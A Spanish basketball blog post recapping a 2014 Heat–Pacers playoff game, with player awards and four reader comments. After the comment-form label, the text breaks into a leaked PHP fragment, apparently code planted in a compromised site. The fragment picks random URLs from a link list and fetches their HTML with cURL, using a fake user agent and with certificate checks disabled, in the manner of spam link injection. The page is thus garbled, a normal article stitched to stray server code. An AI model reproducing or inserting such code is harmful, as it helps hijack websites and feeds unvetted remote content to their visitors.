La Crónica: James contesta

27 de May de 2014 por Simon

Lance Stephenson llevaba los últimos días tratando de desestabilizar y provocar a Lebron con sus declaraciones, cosa que muchos veíamos como un acto de inconsciencia fruto del descaro típico de la edad. Sabíamos que lo más probable es terminara pagándolo muy caro porque “King James” es eso, el rey de la liga cosa que demuestra partido a partido, como ayer. Ya tiene a su equipo al borde de la cuarta final consecutiva.

Hasta ahora los Pacers habían llevado el peso de la serie e incluso habían sido superiores la mayor parte del tiempo de la misma pero a los Heat les estaba bastando con las genialidades de James y Wade en los minutos finales de los partidos para llevárselos. Ayer no fue así, los Heat dominaron a su rival desde el mismo salto inicial hasta el bocinazo final del encuentro y prácticamente no dieron opción a los de Vogel.  Dwayne Wade estuvo más desacertado que en otras ocasiones pero los campeones contaron con un excelso Chris Bosh que se enchufó desde el primer minuto y que con su gran efectividad se convirtió en el factor diferencial respecto a los demás partidos de la serie. Aún con los Heat desatados, los Pacers  aguantaron el ritmo hasta el descanso gracias a  Scola y West pero en la segunda parte el golpe fue letal. Un triple de Lebron James nada más volver del vestuario ya anunciaba lo que estaba por venir. Eran los primeros de los 14 puntos que anotaría en un tercer cuarto que acabó con una renta superior a la quincena para los Heat. Los 20 puntos de desventaja que acumularon los Pacers tras un triple de Norris Cole ya en el último cuarto les hizo izar la bandera blanca y abandonar. Con el juego decidido apareció Stephenson para anotar sus primeros puntos en juego pero ya nada importaba. Los Heat habían vencido y prácticamente sentenciado la serie con esta victoria (90-102). 

La serie viaja de nuevo a Indiana con una sensación totalmente distinta a la que salió de allí. El panorama ha cambiado. A pesar del 1-1 en el marcador, los Pacers dejaron su casa como el equipo dominador de la serie y con la sensación de que habían dejado escapar vivos a Lebron y compañía por no matar el segundo encuentro. Así ha sido. Una vez escapada la presa el cazador se convirtió en cazado. Lebron y compañía no se han dejado sorprender en su casa y han dejado a sus rivales prácticamente moribundos a la espera de que la serie caiga ya por su propio peso.

PREMIOS

MVP: Un extra motivadísimo Lebron James (32p – 10r – 5a) superó a todo el que se le pusó por delante, sobretodo en el tercer cuarto que acabó con catapultar a los Heat.

Sorpresa: Tras 3 partidos sin aparecer prácticamente por fin despertó Chris Bosh. Anotó 17 puntos en la primera parte y acabó el encuentro con 25 a los que sumó 6 rebotes.

Decepción: Compartido entre Roy Hibbert (se quedó sin anotar por cuarta vez en estos playoffs) y Lance Stephenson. Al escolta, aparte de acabar  protagonizando una pobre actuación, se le ocurrió picar a Lebron en la previa y el resultado “está ahí, todo el mundo lo ha visto” (que diría Aitor Karanka).

Esfuerzo en vano: Prácticamente todo el peso del juego ofensivo de los Pacers pasó por las manos de solo 4 hombres: Paul George, David West, George Hill y, en menor medida, Luis Scola. El resto missing.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    bastante es esfuerzo de unos poco talentosos Pacers, frente al mejor equipo de la liga, y que estará en discusión como uno de los mejores de la historia,

    da toda la sensación que no solo ganaran este año la liga, y tendrán su cuarta final consecutiva, sino que también serán finalistas por el este el próximo año, en esta conferencia no tienen rival

      Citar

  2. Ruxixon dice:
    #2

    Como equipo los Spurs le dan 1000 vueltas a Miami,y más que me pese,2 años de milagros ante el mismo equipo me parece imposible,así que si tuviera que jugarme mis ahorros,San Antonio tendría mi dinero.

    Echaba de menos esta versión defensiva de los Heat,y habría que ir pensando en que una de las claves de la final será tener más descanso que el rival,así que espero que cercenen las aspiraciones de Indiana en el próximo partido.Por otra parte estopa de la buena en el Plus para Stephenson,del cual dicen que tiene demasiado protagonismo en el equipo -discrepo- y señalándolo como uno de los desestabilizadores del vestuario -agree-,y también para Vogel,enfatizando el pésimo trabajo ofensivo del equipo -de acuerdo también-.No sé qué pensais vosotros.

      Citar

  3. Denise dice:
    #3

    Esteban:
    bastante es esfuerzo de unos poco talentosos Pacers, frente al mejor equipo de la liga, y que estará en discusión como uno de los mejores de la historia,

    da toda la sensación que no solo ganaran este año la liga, y tendrán su cuarta final consecutiva, sino que también serán finalistas por el este el próximo año, en esta conferencia no tienen rival

    Como equipo, creo que los Pacers son bastante mejores que los Heat, su plantilla es mucho más profunda y equilibrada en cada una de sus lineas, la diferencia es que Lebron es el mejor jugador no del mundo, sino de los últimos 20 años y está en modo imparable, pero aun así, joder, los Pacers tienen un plantillón y deberian estar poniendo en más apuros a Miami.
    Si Miami hace three-peat este año, creo que con esta base será su último anillo. El año que viene con los sueldos de su Big3 estará muy hipotecado, y gente muy importante en el equipo como Chalmers, Andersen ó Allen acaban contrato y creo que no seguirán, Los dos primeros con la tranquilidad de tener varios anillos en sus manos. buscarán el máximo contrato posible y no creo que los Heat sean quienes se los puedan ofrecer. Ray Allen creo que se retirará, y D-Wade será otro año más viejo. Ante ese panorama, creo que será muy dificil rodear al Big 3 de gente de calidad, por lo que creo que Miami a comienzos de la temporada que viene, debería traspasar a Bosh a cambio de 3 jugadores que le den más profundidad al equipo.

      Citar

  4. Esteban dice:
    #4

    Cuando una cosa funciona por q cxambiarla? Vamos q el heat esta a un juego de final de nba con solo dos derrotas en PO, pensar q van por el mal camino o q deben cambiar algo es simplemente una locura

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>